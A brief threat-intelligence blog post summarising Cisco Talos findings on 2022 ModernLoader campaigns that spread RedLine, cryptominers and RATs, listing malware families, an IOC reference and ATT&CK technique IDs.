top of page
Search
Writer's pictureStormsec

ModernLoader delivers multiple stealers, cryptominers and RATs

Cisco Talos recently observed three separate, but related, campaigns between March and June 2022 delivering a variety of threats, including the ModernLoader bot, RedLine and cryptocurrency-mining malware to victims. The actors use PowerShell, .NET assemblies, and HTA and VBS files to spread across a targeted network, eventually dropping other pieces of malware, such as the SystemBC trojan and DCRAT, to enable various stages of their operations with the final payload being ModernLoader.


REFERENCES: https://raw.githubusercontent.com/Cisco-Talos/IOCs/main/2022/08/modernloader-delivers-multiple-stealers.txt



GROUP: windows


MALWARE FAMILIES: ModernLoader, Redline


ATT&CK IDS: T1055 - Process Injection, T1027 - Obfuscated Files or Information, T1059.001 - PowerShell, T1053 - Scheduled Task/Job, TA0003 - Persistence, TA0011 - Command and Control, T1088 - Bypass User Account Control


Read More:

3 views

Comments


Commenting has been turned off.
bottom of page